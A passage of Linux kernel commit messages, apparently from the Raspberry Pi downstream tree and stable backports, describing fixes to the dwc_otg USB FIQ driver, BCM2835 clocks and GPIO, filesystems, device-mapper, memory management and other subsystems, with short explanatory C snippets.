runs the risk of the FIQ starting a transaction too late in a full-speed
frame. If the device is still transmitting data when EOF2 for the
downstream frame occurs, the hub will disable the port. This change is
not reflected in the hub status endpoint and the device becomes
unresponsive.
Prevent high-bandwidth transactions from being started too late in a
frame. The mechanism is not guaranteed: a combination of bit stuffing
and hub latency may still result in a device overrunning.
fiq_fsm: fix bounce buffer utilisation for Isochronous OUT
Multi-packet isochronous OUT transactions were subject to a few boundary
bugs. Fix them.
Audio playback is now much more robust: however, an issue stands with
devices that have adaptive sinks - ALSA plays samples too fast.
dwc_otg: Return full-speed frame numbers in HS mode
The frame counter increments on every *microframe* in high-speed mode.
Most device drivers expect this number to be in full-speed frames - this
caused considerable confusion to e.g. snd_usb_audio which uses the
frame counter to estimate the number of samples played.
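In high-speed mode there are eight microframes per 1 ms frame, so the conversion
device drivers expect is a simple shift; a minimal stand-alone illustration
(not driver code):
#include <stdio.h>

/* 8 microframes per full-speed frame in high-speed mode */
static unsigned int hs_uframe_to_frame(unsigned int uframe)
{
        return uframe >> 3;
}

int main(void)
{
        /* e.g. microframe counter 8000 corresponds to frame 1000 */
        printf("%u\n", hs_uframe_to_frame(8000));
        return 0;
}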
fiq_fsm: save PID on completion of interrupt OUT transfers
Also add edge case handling for interrupt transports.
Note that for periodic split IN, data toggles are unimplemented in the
OTG host hardware - it unconditionally accepts any PID.
fiq_fsm: add missing case for fiq_fsm_tt_in_use()
Certain combinations of bitrate and endpoint activity could
result in a periodic transaction erroneously getting started
while the previous Isochronous OUT was still active.
fiq_fsm: clear hcintmsk for aborted transactions
Prevents the FIQ from erroneously handling interrupts
on a timed out channel.
fiq_fsm: enable by default
fiq_fsm: fix dequeues for non-periodic split transactions
If a dequeue happened between the SSPLIT and CSPLIT phases of the
transaction, the HCD would never receive an interrupt.
fiq_fsm: Disable by default
fiq_fsm: Handle HC babble errors
The HCTSIZ transfer size field raises a babble interrupt if
the counter wraps. Handle the resulting interrupt in this case.
dwc_otg: fix interrupt registration for fiq_enable=0
Additionally make the module parameter conditional for wherever
hcd->fiq_state is touched.
fiq_fsm: Enable by default
dwc_otg: Fix various issues with root port and transaction errors
Process the host port interrupts correctly (and don't trample them).
Root port hotplug now functional again.
Fix a few thinkos with the transaction error passthrough for fiq_fsm.
fiq_fsm: Implement hack for Split Interrupt transactions
Hubs aren't too picky about which endpoint we send Control type split
transactions to. By treating Interrupt transfers as Control, it is
possible to use the non-periodic queue in the OTG core as well as the
non-periodic FIFOs in the hub itself. This massively reduces the
microframe exclusivity/contention that periodic split transactions
otherwise have to enforce.
It goes without saying that this is a fairly egregious USB specification
violation, but it works.
Original idea by Hans Petter Selasky @ FreeBSD.org.
dwc_otg: FIQ support on SMP. Set up FIQ stack and handler on Core 0 only.
dwc_otg: introduce fiq_fsm_spin(un|)lock()
SMP safety for the FIQ relies on register read-modify write cycles being
completed in the correct order. Several places in the DWC code modify
registers also touched by the FIQ. Protect these by a bare-bones lock
mechanism.
This also makes it possible to run the FIQ and IRQ handlers on different
cores.
fiq_fsm: fix build on bcm2708 and bcm2709 platforms
dwc_otg: put some barriers back where they should be for UP
bcm2709/dwc_otg: Setup FIQ on core 1 if >1 core active
dwc_otg: fixup read-modify-write in critical paths
Be more careful about read-modify-write on registers that the FIQ
also touches.
Guard fiq_fsm_spin_lock with fiq_enable check
fiq_fsm: Falling out of the state machine isn't fatal
This edge case can be hit if the port is disabled while the FIQ is
in the middle of a transaction. Make the effects less severe.
Also get rid of the useless return value.
squash: dwc_otg: Allow to build without SMP
usb: core: make overcurrent messages more prominent
Hub overcurrent messages are more serious than "debug". Increase loglevel.
usb: dwc_otg: Don't use dma_to_virt()
Commit 6ce0d20 changes dma_to_virt() which breaks this driver.
Open code the old dma_to_virt() implementation to work around this.
Limit the use of __bus_to_virt() to cases where transfer_buffer_length
is set and transfer_buffer is not set. This is done to increase the
chance that this driver will also work on ARCH_BCM2835.
transfer_buffer should not be NULL if the length is set, but the
comment in the code indicates that there are situations where this
might happen. drivers/usb/isp1760/isp1760-hcd.c also has a similar
comment pointing to a possible: 'usb storage / SCSI bug'.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
dwc_otg: Fix crash when fiq_enable=0
dwc_otg: fiq_fsm: Make high-speed isochronous strided transfers work properly
Certain low-bandwidth high-speed USB devices (specialist audio devices,
compressed-frame webcams) have packet intervals > 1 microframe.
Stride these transfers in the FIQ by using the start-of-frame interrupt
to restart the channel at the right time.
dwc_otg: Force host mode to fix incorrect compute module boards
dwc_otg: Add ARCH_BCM2835 support
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
dwc_otg: Simplify FIQ irq number code
Dropping ATAGS means we can simplify the FIQ irq number code.
Also add error checking on the returned irq number.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
dwc_otg: Remove duplicate gadget probe/unregister function
dwc_otg: Properly set the HFIR
Douglas Anderson reported:
According to the most up to date version of the dwc2 databook, the FRINT
field of the HFIR register should be programmed to:
* 125 us * (PHY clock freq for HS) - 1
* 1000 us * (PHY clock freq for FS/LS) - 1
This is opposed to older versions of the doc that claimed it should be:
* 125 us * (PHY clock freq for HS)
* 1000 us * (PHY clock freq for FS/LS)
and reported lower timing jitter on a USB analyser
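As arithmetic, the corrected formula is just the frame interval in PHY clocks
minus one; a small stand-alone sketch, assuming representative PHY clock
frequencies of 60 MHz (HS) and 48 MHz (FS), which are examples rather than
values from the commit:
#include <stdio.h>

/* FRINT = interval * phy_clk - 1: 125 us intervals in HS mode,
 * 1000 us intervals in FS/LS mode. */
static unsigned int frint_hs(unsigned int phy_hz) { return phy_hz / 8000 - 1; }
static unsigned int frint_fs(unsigned int phy_hz) { return phy_hz / 1000 - 1; }

int main(void)
{
        printf("HS, 60 MHz PHY: FRINT = %u\n", frint_hs(60000000)); /* 7499 */
        printf("FS, 48 MHz PHY: FRINT = %u\n", frint_fs(48000000)); /* 47999 */
        return 0;
}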
dwc_otg: trim xfer length when a buffer larger than the allocated size is received
dwc_otg: Don't free qh align buffers in atomic context
dwc_otg: Enable the hack for Split Interrupt transactions by default
dwc_otg.fiq_fsm_mask=0xF has long been a suggestion for users with audio stutters or other USB bandwidth issues.
So far we are aware of many success stories but no failure caused by this setting.
Make it a default to learn more.
See: https://www.raspberrypi.org/forums/viewtopic.php?f=28&t=70437
Signed-off-by: popcornmix <popcornmix@gmail.com>
dwc_otg: Use kzalloc when suitable
While the SDRAM is being driven by its dedicated PLL most of the time,
there is a little loop running in the firmware that periodically turns
on the CM SDRAM clock (using its pre-initialized parent) and switches
SDRAM to using the CM clock to do PVT recalibration.
This avoids system hangs if we choose SDRAM's parent for some other
clock, then disable that clock.
Signed-off-by: Eric Anholt <eric@anholt.net>
These divide off of PLLD_PER and are used as the source PLLs for the
ethernet and wifi PHYs. Neither of them is currently represented by a phy
device that would grab the clock for us.
This keeps other drivers from killing the networking PHYs when they
disable their own clocks and trigger PLLD_PER's refcount going to 0.
v2: Skip marking as critical if they aren't on at boot.
Signed-off-by: Eric Anholt <eric@anholt.net>
The VPU clock is also the clock for our AXI bus, so we really can't
disable it. This might have happened during boot if, for example,
uart1 (aux_uart clock) probed and was then disabled before the other
consumers of the VPU clock had probed.
v2: Rewrite to use a .flags in bcm2835_clock_data, since other clocks
will need this too.
Signed-off-by: Eric Anholt <eric@anholt.net>
Load driver early since at least bcm2708_fb doesn't support deferred
probing and even if it did, we don't want the video driver deferred.
Support the legacy DMA API which is needed by bcm2708_fb.
Don't mask out channel 2.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
The VideoCore bootloader passes in Serial number and
Revision number through Device Tree. Make these available to
userspace through /proc/cpuinfo.
Mainline status:
There is a commit in linux-next that standardize passing the serial
number through Device Tree (string: /serial-number):
ARM: 8355/1: arch: Show the serial number from devicetree in cpuinfo
There was an attempt to do the same with the revision number, but it
didn't get in:
[PATCH v2 1/2] arm: devtree: Set system_rev from DT revision
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
The spi-bcm2835 driver automatically uses GPIO chip-selects due to
some unreliability of the native ones. In doing so it chooses the
same pins as the native chip-selects would use, but the existing
code always uses pins 7 and 8, wherever the SPI function is mapped.
Search the pinctrl group assigned to the driver for pins that
correspond to native chip-selects, and use those for GPIO chip-
selects.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
When dynamically unloading overlays, it is important that freed pins are
restored to being inputs to prevent functions from being enabled in
multiple places at once.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
Although the GPIO controller can generate three interrupts (four counting
the common one), the device tree files currently only specify two. In the
absence of the third, simply don't register that interrupt (as opposed to
registering 0), which has the effect of making it impossible to generate
interrupts for GPIOs 46-53 which, since they share pins with the SD card
interface, is unlikely to be a problem.
Contrary to the documentation, the BCM2835 GPIO controller actually has
four interrupt lines - one each for the three IRQ groups and one common. Rather
confusingly, the GPIO interrupt groups don't correspond directly with the GPIO
control banks. Instead, GPIOs 0-27 generate IRQ GPIO0, 28-45 GPIO1 and
46-53 GPIO2.
Awkwardly, the GPIOs for IRQ GPIO1 straddle two 32-entry GPIO banks, so it is
cleaner to split out a function to process the interrupts for a single GPIO
bank.
This bug has only just been observed because GPIOs above 27 can only be
accessed on an old Raspberry Pi with the optional P5 header fitted, where
the pins are often used for I2S instead.
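The grouping described above boils down to a small range check; a purely
illustrative stand-alone version (not the driver's code):
#include <stdio.h>

/* GPIOs 0-27 raise IRQ GPIO0, 28-45 raise GPIO1 and 46-53 raise GPIO2;
 * note that group 1 straddles the two 32-entry GPIO register banks. */
static int gpio_irq_group(unsigned int gpio)
{
        if (gpio <= 27)
                return 0;
        if (gpio <= 45)
                return 1;
        if (gpio <= 53)
                return 2;
        return -1;                      /* out of range */
}

int main(void)
{
        printf("gpio 27 -> group %d\n", gpio_irq_group(27));
        printf("gpio 32 -> group %d\n", gpio_irq_group(32)); /* bank 1 */
        printf("gpio 46 -> group %d\n", gpio_irq_group(46));
        return 0;
}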
Add a duplicate irq range with an offset on the hwirqs so the
driver can detect that enable_fiq() is used.
Tested with downstream dwc_otg USB controller driver.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Reviewed-by: Eric Anholt <eric@anholt.net>
Acked-by: Stephen Warren <swarren@wwwdotorg.org>
The old arch-specific IRQ macros included a dsb to ensure the
write to clear the mailbox interrupt completed before returning
from the interrupt. The BCM2836 irqchip driver needs the same
precaution to avoid spurious interrupts.
Spurious interrupts are still possible for other reasons,
though, so trap them early.
See commit dae803e165 -- the warning is
expected sometimes when using CMA. However, that commit still spams
my kernel log with these warnings.
Signed-off-by: Eric Anholt <eric@anholt.net>
tty_port_hangup sets a port's tty field to NULL (holding the port lock),
but uart_tx_stopped, called from __uart_start (with the port lock),
uses the tty field without checking for NULL.
Change uart_tx_stopped to treat a NULL tty field as another stopped
indication.
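A minimal sketch of the shape of that check in the serial_core helper; this is
illustrative of the change described above, not the exact upstream diff:
/* Treat a NULL tty as another "stopped" indication so __uart_start()
 * cannot dereference it while tty_port_hangup() is clearing port->tty. */
static inline int uart_tx_stopped(struct uart_port *port)
{
        struct tty_struct *tty = port->state->port.tty;

        if (!tty || tty->stopped || tty->hw_stopped)
                return 1;
        return 0;
}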
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
smsc95xx is adjusting truesize when it shouldn't, and following a recent patch from Eric this is now triggering warnings.
This patch stops smsc95xx from changing truesize.
Signed-off-by: Steve Glendinning <steve.glendinning@smsc.com>
commit cebf8fd169 upstream.
The global mutex of 'gdp_mutex' is used to serialize creating/querying
glue dir and its cleanup. It turns out this isn't a perfect way because
part of the actual cleanup (kobj_kset_leave()) is done inside
the release handler of the glue dir kobject. That means gdp_mutex has
to be held before releasing the last reference count of the glue dir
kobject.
This patch moves glue dir's cleanup after kobject_del() in device_del()
for avoiding the race.
Cc: Yijing Wang <wangyijing@huawei.com>
Reported-by: Chandra Sekhar Lingutla <clingutla@codeaurora.org>
Signed-off-by: Ming Lei <ming.lei@canonical.com>
Cc: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e7cd190385 upstream.
Kdump(kexec-tools) parses /proc/iomem to identify all the memory regions
on the system. Since the current kernel names "nomap" regions, like UEFI
runtime services code/data, as "System RAM," kexec-tools sets up elf core
header to include them in a crash dump file (/proc/vmcore).
Then crash dump kernel parses UEFI memory map again, re-marks those regions
as "nomap" and does not create a memory mapping for them unlike the other
areas of System RAM. In this case, copying /proc/vmcore through
copy_oldmem_page() on crash dump kernel will end up with a kernel abort,
as reported in [1].
This patch names all the "nomap" regions explicitly as "reserved" so that
we can exclude them from a crash dump file. acpi_os_ioremap() must also
be modified because those regions have WB attributes [2].
Apart from kdump, this change also matches x86's use of acpi (and
/proc/iomem).
[1] http://lists.infradead.org/pipermail/linux-arm-kernel/2016-August/448186.html
[2] http://lists.infradead.org/pipermail/linux-arm-kernel/2016-August/450089.html
Reviewed-by: Catalin Marinas <catalin.marinas@arm.com>
Tested-by: James Morse <james.morse@arm.com>
Reviewed-by: James Morse <james.morse@arm.com>
Signed-off-by: AKASHI Takahiro <takahiro.akashi@linaro.org>
Signed-off-by: Will Deacon <will.deacon@arm.com>
Cc: Matthias Brugger <mbrugger@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6b10b23ca9 upstream.
xlog_recover_clear_agi_bucket didn't set the
type to XFS_BLFT_AGI_BUF, so we got a warning during log
replay (or an ASSERT on a debug build).
XFS (md0): Unknown buffer type 0!
XFS (md0): _xfs_buf_ioapply: no ops on block 0xaea8802/0x1
Fix this, as was done in f19b872b for 2 other locations
with the same problem.
Signed-off-by: Eric Sandeen <sandeen@redhat.com>
Reviewed-by: Brian Foster <bfoster@redhat.com>
Reviewed-by: Christoph Hellwig <hch@lst.de>
Signed-off-by: Dave Chinner <david@fromorbit.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 30faaafdfa upstream.
Commit 9c17d96500 ("xen/gntdev: Grant maps should not be subject to
NUMA balancing") set VM_IO flag to prevent grant maps from being
subjected to NUMA balancing.
It was discovered recently that this flag causes get_user_pages() to
always fail with -EFAULT.
check_vma_flags
__get_user_pages
__get_user_pages_locked
__get_user_pages_unlocked
get_user_pages_fast
iov_iter_get_pages
dio_refill_pages
do_direct_IO
do_blockdev_direct_IO
do_blockdev_direct_IO
ext4_direct_IO_read
generic_file_read_iter
aio_run_iocb
(which can happen if guest's vdisk has direct-io-safe option).
To avoid this let's use VM_MIXEDMAP flag instead --- it prevents
NUMA balancing just as VM_IO does and has no effect on
check_vma_flags().
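As a rough sketch of the change in gntdev_mmap() (the accompanying flags shown
here are illustrative; the point is only the VM_IO to VM_MIXEDMAP swap):

  /* was: vma->vm_flags |= VM_DONTEXPAND | VM_DONTDUMP | VM_IO; */
  vma->vm_flags |= VM_DONTEXPAND | VM_DONTDUMP | VM_MIXEDMAP;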
Reported-by: Olaf Hering <olaf@aepfle.de>
Suggested-by: Hugh Dickins <hughd@google.com>
Signed-off-by: Boris Ostrovsky <boris.ostrovsky@oracle.com>
Acked-by: Hugh Dickins <hughd@google.com>
Tested-by: Olaf Hering <olaf@aepfle.de>
Signed-off-by: Juergen Gross <jgross@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2d13bb6494 upstream.
We've got a delay loop waiting for secondary CPUs. That loop uses
loops_per_jiffy. However, loops_per_jiffy doesn't actually mean how
many tight loops make up a jiffy on all architectures. It is quite
common to see things like this in the boot log:
Calibrating delay loop (skipped), value calculated using timer
frequency.. 48.00 BogoMIPS (lpj=24000)
In my case I was seeing lots of cases where other CPUs timed out
entering the debugger only to print their stack crawls shortly after the
kdb> prompt was written.
Elsewhere in kgdb we already use udelay(), so that should be safe enough
to use to implement our timeout. We'll delay 1 ms for 1000 times, which
should give us a full second of delay (just like the old code wanted)
but allow us to notice that we're done every 1 ms.
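A minimal sketch of such a loop (kgdb_roundup_done() is a hypothetical
stand-in name for the real "all CPUs are in the debugger" check):

  int time_left = 1000;                   /* 1000 * 1 ms = 1 s total */

  while (!kgdb_roundup_done() && --time_left)
          udelay(1000);                   /* recheck every millisecond */
  if (!time_left)
          pr_crit("Timed out waiting for secondary CPUs.\n");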
[akpm@linux-foundation.org: simplifications, per Daniel]
Link: http://lkml.kernel.org/r/1477091361-2039-1-git-send-email-dianders@chromium.org
Signed-off-by: Douglas Anderson <dianders@chromium.org>
Reviewed-by: Daniel Thompson <daniel.thompson@linaro.org>
Cc: Jason Wessel <jason.wessel@windriver.com>
Cc: Brian Norris <briannorris@chromium.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9eff1140a8 upstream.
Systemd on reboot enables the shutdown watchdog, which leaves the watchdog
device open to ensure that even if the power-down process gets stuck the
platform reboots nonetheless.
The iamt_wdt is an alarm-only watchdog and can't reboot the system, but the
FW will generate an alarm event even if the reboot completed in time, as the
watchdog is not automatically disabled during the power cycle.
So we should request that the watchdog be stopped on reboot to eliminate the
spurious alarm from the FW.
Signed-off-by: Alexander Usyskin <alexander.usyskin@intel.com>
Signed-off-by: Tomas Winkler <tomas.winkler@intel.com>
Reviewed-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4d1f0fb096 upstream.
NMI handler doesn't call set_irq_regs(), it's set only by normal IRQ.
Thus get_irq_regs() returns NULL or stale registers snapshot with IP/SP
pointing to the code interrupted by IRQ which was interrupted by NMI.
NULL isn't a problem: in this case the watchdog calls dump_stack() and
prints the full stack trace including the NMI. But if we're stuck in an IRQ
handler then the NMI watchdog will print a stack trace without the IRQ part
at all.
This patch uses registers snapshot passed into NMI handler as arguments:
these registers point exactly to the instruction interrupted by NMI.
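Sketch of the hardlockup path in watchdog_overflow_callback(), simplified and
omitting the warn/panic plumbing:

  static void watchdog_overflow_callback(struct perf_event *event,
                                         struct perf_sample_data *data,
                                         struct pt_regs *regs)
  {
          if (!is_hardlockup())
                  return;
          /* regs is the snapshot taken at NMI entry; get_irq_regs() here
           * would be NULL or point at the code interrupted by the IRQ. */
          if (regs)
                  show_regs(regs);
          else
                  dump_stack();
  }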
Fixes: 55537871ef ("kernel/watchdog.c: perform all-CPU backtrace in case of hard lockup")
Link: http://lkml.kernel.org/r/146771764784.86724.6006627197118544150.stgit@buzz
Signed-off-by: Konstantin Khlebnikov <khlebnikov@yandex-team.ru>
Cc: Jiri Kosina <jkosina@suse.cz>
Cc: Ulrich Obergfell <uobergfe@redhat.com>
Cc: Aaron Tomlin <atomlin@redhat.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e3d240e9d5 upstream.
If maxBuf is not 0 but less than the size of the SMB2 lock structure,
we can end up with memory corruption.
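The added guard is essentially a bounds check before building the lock array,
along the lines of (a sketch, not the literal diff):

  unsigned int max_buf = tcon->ses->server->maxBuf;

  if (max_buf < sizeof(struct smb2_lock_element))
          return -EINVAL;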
Signed-off-by: Pavel Shilovsky <pshilov@microsoft.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 53e0e11efe upstream.
We can not unlock/lock cifs_tcp_ses_lock while walking through ses
and tcon lists because it can corrupt list iterator pointers and
a tcon structure can be released if we don't hold an extra reference.
Fix it by moving a reconnect process to a separate delayed work
and acquiring a reference to every tcon that needs to be reconnected.
Also do not send an echo request on newly established connections.
Signed-off-by: Pavel Shilovsky <pshilov@microsoft.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 314c25c56c upstream.
In dm_sm_metadata_create() we temporarily change the dm_space_map
operations from 'ops' (whose .destroy function deallocates the
sm_metadata) to 'bootstrap_ops' (whose .destroy function doesn't).
If dm_sm_metadata_create() fails in sm_ll_new_metadata() or
sm_ll_extend(), it exits back to dm_tm_create_internal(), which calls
dm_sm_destroy() with the intention of freeing the sm_metadata, but it
doesn't (because the dm_space_map operations is still set to
'bootstrap_ops').
Fix this by setting the dm_space_map operations back to 'ops' if
dm_sm_metadata_create() fails when it is set to 'bootstrap_ops'.
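Roughly, as a sketch of dm_sm_metadata_create()'s error path (the exact code
differs):

  memcpy(&smm->sm, &bootstrap_ops, sizeof(smm->sm));

  r = sm_ll_new_metadata(&smm->ll, tm);
  if (!r)
          r = sm_ll_extend(&smm->ll, nr_blocks);

  /* Switch back to the real ops before checking r, so that a later
   * dm_sm_destroy() actually frees the sm_metadata on failure. */
  memcpy(&smm->sm, &ops, sizeof(smm->sm));
  if (r)
          return r;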
Signed-off-by: Benjamin Marzinski <bmarzins@redhat.com>
Acked-by: Joe Thornber <ejt@redhat.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d15bb3a646 upstream.
It is required to hold the queue lock when calling blk_run_queue_async()
to avoid that a race between blk_run_queue_async() and
blk_cleanup_queue() is triggered.
Signed-off-by: Bart Van Assche <bart.vanassche@sandisk.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 265e9098ba upstream.
In crypt_set_key(), if a failure occurs while replacing the old key
(e.g. tfm->setkey() fails) the key must not have DM_CRYPT_KEY_VALID flag
set. Otherwise, the crypto layer would have an invalid key that still
has DM_CRYPT_KEY_VALID flag set.
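The essence of the fix in crypt_set_key(), sketched (helper name as assumed
for this era's code):

  /* Anything below may invalidate a previously valid key. */
  clear_bit(DM_CRYPT_KEY_VALID, &cc->flags);

  r = crypt_setkey_allcpus(cc);
  if (!r)
          set_bit(DM_CRYPT_KEY_VALID, &cc->flags);

  return r;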
Signed-off-by: Ondrej Kozina <okozina@redhat.com>
Reviewed-by: Mikulas Patocka <mpatocka@redhat.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bff7e067ee upstream.
Fix to return error code -EINVAL instead of 0, as is done elsewhere in
this function.
Fixes: e80d1c805a ("dm: do not override error code returned from dm_get_device()")
Signed-off-by: Wei Yongjun <weiyj.lk@gmail.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 301fc3f5ef upstream.
When dm_table_set_type() is used by a target to establish a DM table's
type (e.g. DM_TYPE_MQ_REQUEST_BASED in the case of DM multipath) the
DM core must go on to verify that the devices in the table are
compatible with the established type.
Fixes: e83068a5 ("dm mpath: add optional "queue_mode" feature")
Signed-off-by: Bart Van Assche <bart.vanassche@sandisk.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6936c12cf8 upstream.
An earlier DM multipath table could have been built on top of underlying
devices that were all using blk-mq. In that case, if that active
multipath table is replaced with an empty DM multipath table (that
reflects all paths have failed) then it is important that the
'all_blk_mq' state of the active table is transferred to the new empty DM
table. Otherwise dm-rq.c:dm_old_prep_tio() will incorrectly clone a
request that isn't needed by the DM multipath target when it is to issue
IO to an underlying blk-mq device.
Fixes: e83068a5 ("dm mpath: add optional "queue_mode" feature")
Reported-by: Bart Van Assche <bart.vanassche@sandisk.com>
Tested-by: Bart Van Assche <bart.vanassche@sandisk.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 91291d9ad9 upstream.
Joonyoung Shim reported an interesting problem on his ARM octa-core
Odroid-XU3 platform. During system suspend, dev_pm_opp_put_regulator()
was failing for a struct device for which dev_pm_opp_set_regulator() is
called earlier.
This happened because an earlier call to
dev_pm_opp_of_cpumask_remove_table() function (from cpufreq-dt.c file)
removed all the entries from opp_table->dev_list apart from the last CPU
device in the cpumask of CPUs sharing the OPP.
But both dev_pm_opp_set_regulator() and dev_pm_opp_put_regulator()
routines get CPU device for the first CPU in the cpumask. And so the OPP
core failed to find the OPP table for the struct device.
This patch attempts to fix this problem by returning a pointer to the
opp_table from dev_pm_opp_set_regulator() and using that as the
parameter to dev_pm_opp_put_regulator(). This ensures that the
dev_pm_opp_put_regulator() doesn't fail to find the opp table.
Note that similar design problem also exists with other
dev_pm_opp_put_*() APIs, but those aren't used currently by anyone and
so we don't need to update them for now.
Reported-by: Joonyoung Shim <jy0922.shim@samsung.com>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Viresh Kumar <viresh.kumar@linaro.org>
[ Viresh: Wrote commit log and tested on exynos 5250 ]
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit eaa496ffaa upstream.
ep->mult is supposed to be set to the Isochronous and
Interrupt Endpoint's multiplier value. This value
is computed from different places depending on the
link speed.
If we're dealing with HighSpeed, then it's part of
bits [12:11] of wMaxPacketSize. This case wasn't
taken into consideration before.
While at that, also make sure the ep->mult defaults
to one so drivers can use it unconditionally and
assume they'll never multiply ep->maxpacket to zero.
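A sketch of the high-speed case (desc and gadget are illustrative locals, not
necessarily the names used by the patch):

  u16 maxp = usb_endpoint_maxp(desc);     /* raw wMaxPacketSize */

  ep->mult = 1;                           /* sane default for all speeds */
  if (gadget->speed == USB_SPEED_HIGH &&
      (usb_endpoint_xfer_isoc(desc) || usb_endpoint_xfer_int(desc)))
          ep->mult = 1 + ((maxp >> 11) & 0x3);    /* bits 12:11 */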
Cc: <stable@vger.kernel.org>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a6de734bc0 upstream.
Vlastimil Babka pointed out that commit 479f854a20 ("mm, page_alloc:
defer debugging checks of pages allocated from the PCP") will allow the
per-cpu list counter to be out of sync with the per-cpu list contents if
a struct page is corrupted.
The consequence is an infinite loop if the per-cpu lists get fully
drained by free_pcppages_bulk because all the lists are empty but the
count is positive. The infinite loop occurs here
	do {
		batch_free++;
		if (++migratetype == MIGRATE_PCPTYPES)
			migratetype = 0;
		list = &pcp->lists[migratetype];
	} while (list_empty(list));
What the user sees is a bad page warning followed by a soft lockup with
interrupts disabled in free_pcppages_bulk().
This patch keeps the accounting in sync.
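Sketch of the idea in free_pcppages_bulk(): decrement the counter as the page
leaves the list, before any check can skip it (mt stands in for the page's
migratetype; simplified from the real loop):

  page = list_last_entry(list, struct page, lru);
  list_del(&page->lru);
  pcp->count--;                   /* stays in sync even if the page is bad */

  if (bulkfree_pcp_prepare(page))
          continue;               /* skipping a corrupted page no longer
                                   * leaves count > 0 with empty lists */

  __free_one_page(page, page_to_pfn(page), zone, 0, mt);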
Fixes: 479f854a20 ("mm, page_alloc: defer debugging checks of pages allocated from the PCP")
Link: http://lkml.kernel.org/r/20161202112951.23346-2-mgorman@techsingularity.net
Signed-off-by: Mel Gorman <mgorman@suse.de>
Acked-by: Vlastimil Babka <vbabka@suse.cz>
Acked-by: Michal Hocko <mhocko@suse.com>
Acked-by: Hillf Danton <hillf.zj@alibaba-inc.com>
Cc: Christoph Lameter <cl@linux.com>
Cc: Johannes Weiner <hannes@cmpxchg.org>
Cc: Jesper Dangaard Brouer <brouer@redhat.com>
Cc: Joonsoo Kim <iamjoonsoo.kim@lge.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5f33a0803b upstream.
Our system uses significantly more slab memory with memcg enabled with
the latest kernel. With 3.10 kernel, slab uses 2G memory, while with
4.6 kernel, 6G memory is used. The shrinker has a problem. Suppose we
have two memcgs for one shrinker. In do_shrink_slab:
1. Check cg1. nr_deferred = 0, assume total_scan = 700. batch size
is 1024, then no memory is freed. nr_deferred = 700
2. Check cg2. nr_deferred = 700. Assume freeable = 20, then
total_scan = 10 or 40. Let's assume it's 10. No memory is freed.
nr_deferred = 10.
The deferred share of cg1 is lost in this case. kswapd will free no
memory even if it runs the above steps again and again.
The fix makes sure one memcg's deferred share isn't lost.
Link: http://lkml.kernel.org/r/2414be961b5d25892060315fbb56bb19d81d0c07.1476227351.git.shli@fb.com
Signed-off-by: Shaohua Li <shli@fb.com>
Cc: Johannes Weiner <hannes@cmpxchg.org>
Cc: Michal Hocko <mhocko@kernel.org>
Cc: Vladimir Davydov <vdavydov@parallels.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e4fcf07cca upstream.
When removing a namespace we delete it from the subsystem namespaces
list with list_del_init which allows us to know if it is enabled or
not.
The problem is that list_del_init reinitializes the list's next pointer and
does not respect the RCU list-traversal we do on the IO path for locating
a namespace. Instead we need to use list_del_rcu, which is allowed to
run concurrently with the _rcu list-traversal primitives (it keeps the list's
next pointer intact) and guarantees concurrent nvmet_find_namespace forward
progress.
By changing that, we cannot rely on ns->dev_link for knowing if the
namespace is enabled, so add an enabled indicator entry to nvmet_ns for
that.
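In sketch form (field names as assumed for nvmet of this era):

  /* removal side: keep ->next intact for concurrent _rcu readers */
  ns->enabled = false;
  list_del_rcu(&ns->dev_link);

  /* IO-path lookup keeps working while the removal is in flight */
  rcu_read_lock();
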